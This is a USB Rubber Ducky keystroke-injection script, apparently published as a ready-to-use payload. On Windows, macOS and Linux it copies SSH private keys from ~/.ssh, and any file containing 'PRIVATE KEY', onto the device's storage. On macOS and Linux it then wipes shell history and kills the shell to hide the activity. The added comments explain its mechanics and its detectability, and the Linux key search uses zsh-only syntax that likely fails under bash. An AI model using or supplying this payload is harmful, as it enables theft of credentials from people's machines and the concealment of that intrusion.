REM Title: ExfiltrateSSHKeys
REM Author: thomasgruebl
REM Target: Windows, macOS, Linux (partly functional)
REM Version: 1.0
REM Category: Exfiltration
REM Description: This payload performs an SSH key exfiltration attack by (1)
REM checking the default ssh key location ~/.ssh/ and (2) by performing a
REM grep recursive pattern matching search for an SSH private key in a specified parent directory.
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben

REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay

TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM

REM CONFIGURATION:
REM Milliseconds to wait after each CAPSLOCK press before the lock state is re-read.
DEFINE #RESPONSE_DELAY 25
REM Upper bound on probe iterations; 120 x 25ms is the 3000ms worst case quoted above.
DEFINE #ITERATION_LIMIT 120

REM Press CAPSLOCK until the host reflects the lock state back ($_CAPSLOCK_ON)
REM or the iteration limit is reached. A host that has not finished enumerating
REM the keyboard does not reflect the LED, so the loop doubles as a readiness probe.
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
REM One extra toggle, presumably to turn caps lock back off after the loop ended
REM on reflection; nothing here verifies the final lock state.
CAPSLOCK
END_EXTENSION
REM Enumerate as a composite keyboard + mass-storage device: the keystrokes below
REM are injected through the HID interface and the copied files are written to
REM the STORAGE volume.
ATTACKMODE HID STORAGE

REM Randomise the timing between injected keystrokes.
$_JITTER_ENABLED = TRUE

REM Define OS - Only set ONE definition at the time to TRUE (e.g. DEFINE #WINDOWS TRUE).
REM DEFINE #WINDOWS TRUE, DEFINE #MACOS TRUE, and DEFINE #LINUX TRUE won't function.
REM The three IF_DEFINED_TRUE sections below are independent, so with more than one
REM flag TRUE every selected section would be typed in sequence into the same host.
DEFINE #WINDOWS TRUE
DEFINE #MACOS FALSE
DEFINE #LINUX FALSE

REM Define Rubber Ducky Drive Label
REM Must match the volume label of the STORAGE partition: it is used to build the
REM mount path (/Volumes/<label> on macOS, /media/<user>/<label> on Linux) and, on
REM Windows, to look the drive letter up via Get-Volume -FileSystemLabel.
DEFINE #DUCKY_DRIVE_LABEL DUCKY

REM Using "Desktop" as a sample directory
REM Root of the recursive "PRIVATE KEY" search: resolved relative to the home
REM directory on macOS/Linux (after "cd") and under $env:USERPROFILE on Windows.
DEFINE #PARENT_DIR Desktop
IF_DEFINED_TRUE #MACOS
REM Open Terminal via Spotlight (GUI SPACE), then "cd" to the home directory so
REM the relative paths used below (.ssh, #PARENT_DIR) resolve from there.
DELAY 500
GUI SPACE
DELAY 500
STRING terminal
DELAY 50
ENTER
DELAY 100
STRING cd
DELAY 50
ENTER
DELAY 100

REM Create exfiltration directory + add some extra delay to give the rubber ducky time to mount storage
DELAY 2000
STRING mkdir /Volumes/#DUCKY_DRIVE_LABEL/ssh_exfiltration
DELAY 50
ENTER
DELAY 100

REM Method 1: Copy ~/.ssh dir
REM Copies every non-dot entry of ~/.ssh onto the ducky volume.
STRING cp .ssh/* /Volumes/#DUCKY_DRIVE_LABEL/ssh_exfiltration
DELAY 50
ENTER

DELAY 1000

REM Method 2: Recursively search a parent directory for an ssh key pattern
REM grep -rl lists files under #PARENT_DIR whose contents contain "PRIVATE KEY"
REM (the text found in PEM/OpenSSH private-key headers); ${(f)matches} is zsh
REM newline-splitting, so this line assumes the default macOS zsh shell.
STRING matches=$(grep -rl "PRIVATE KEY" #PARENT_DIR) && for file in ${(f)matches}; do cp "$file" /Volumes/#DUCKY_DRIVE_LABEL/ssh_exfiltration; done;
DELAY 50
ENTER

DELAY 3000

REM Cleaning up

REM 1. Flush shell history
REM Replaces ~/.zsh_history with an empty file and kills the shell ($$), presumably
REM so the in-memory history is never written back on exit. Only the local history
REM file is affected: host-level process auditing (unified log / EDR command-line
REM telemetry) and the files already written to the USB volume are untouched.
STRING history -p && rm -f .zsh_history && touch .zsh_history && kill -9 $$
DELAY 50
ENTER

REM 2. Quit terminal
DELAY 100
GUI q

END_IF_DEFINED
IF_DEFINED_TRUE #WINDOWS

REM Method 1: Copy ~/.ssh dir
REM Typed into the Run dialog (GUI r) as a single PowerShell command line: the
REM consecutive STRING lines are concatenated and only the final ENTER submits.
REM The drive letter is resolved from the volume label so the destination does not
REM depend on which letter Windows assigned to the STORAGE partition. Because the
REM whole one-liner is powershell.exe's command line, process-creation auditing
REM with command-line capture records it verbatim.
GUI r
DELAY 500
STRING powershell "$vol=(Get-Volume -FileSystemLabel '#DUCKY_DRIVE_LABEL').DriveLetter;
STRING mkdir $vol':\'ssh_exfiltration\;
STRING cp -r $env:USERPROFILE\.ssh\* $vol':\'ssh_exfiltration\; Start-Sleep -Seconds 0.5"
DELAY 100
ENTER
DELAY 1000

REM Method 2: Recursively search a parent directory for an ssh key pattern
REM findstr /M /S /P /I lists (filenames only, recursively, skipping files with
REM non-printable characters, case-insensitively) every file under
REM %USERPROFILE%\#PARENT_DIR containing "PRIVATE KEY"; the output is split on
REM newlines and each listed path is copied to the ducky volume.
GUI r
DELAY 100
STRING powershell "$vol=(Get-Volume -FileSystemLabel '#DUCKY_DRIVE_LABEL').DriveLetter;
STRING $matches=(findstr /MSPI 'PRIVATE KEY' $env:USERPROFILE\#PARENT_DIR\*);
STRING $split_matches=$matches -split '`n';
STRING foreach ($line in $split_matches) { cp $line $vol':\'ssh_exfiltration\ }"
DELAY 100
ENTER

DELAY 500
END_IF_DEFINED
IF_DEFINED_TRUE #LINUX

REM Needed longer delays on Ubuntu system while testing
REM CTRL-ALT t is the GNOME/Ubuntu "open terminal" shortcut.
DELAY 3000
CTRL-ALT t
DELAY 3000

REM STRINGLN types the text and presses ENTER. Start from the home directory so
REM .ssh and #PARENT_DIR below resolve relative to it.
STRINGLN cd
DELAY 100

REM identify user
REM The username is needed because the removable volume is expected to automount
REM under /media/<user>/<label>.
STRINGLN USER_NAME=$(whoami)
DELAY 500

STRINGLN mkdir /media/$USER_NAME/#DUCKY_DRIVE_LABEL/ssh_exfiltration
DELAY 100

REM Method 1: Copy ~/.ssh dir
REM Copies every non-dot entry of ~/.ssh onto the ducky volume.
STRINGLN cp .ssh/* /media/$USER_NAME/#DUCKY_DRIVE_LABEL/ssh_exfiltration

DELAY 1000

REM Method 2: Recursively search a parent directory for an ssh key pattern
REM Same grep -rl / copy loop as the macOS section, with the Linux mount path.
STRINGLN matches=$(grep -rl "PRIVATE KEY" #PARENT_DIR) && for file in ${(f)matches}; do cp "$file" /media/$USER_NAME/#DUCKY_DRIVE_LABEL/ssh_exfiltration; done;

DELAY 3000

REM Cleaning up

REM 1. Flush shell history
REM Replaces ~/.bash_history with an empty file and kills the shell ($$). Only the
REM local history file is touched: auditd/EDR process telemetry and the files
REM already written to the USB volume are unaffected.
STRINGLN history -p && rm -f .bash_history && touch .bash_history && kill -9 $$
DELAY 100

REM 2. Quit terminal
STRINGLN exit

END_IF_DEFINED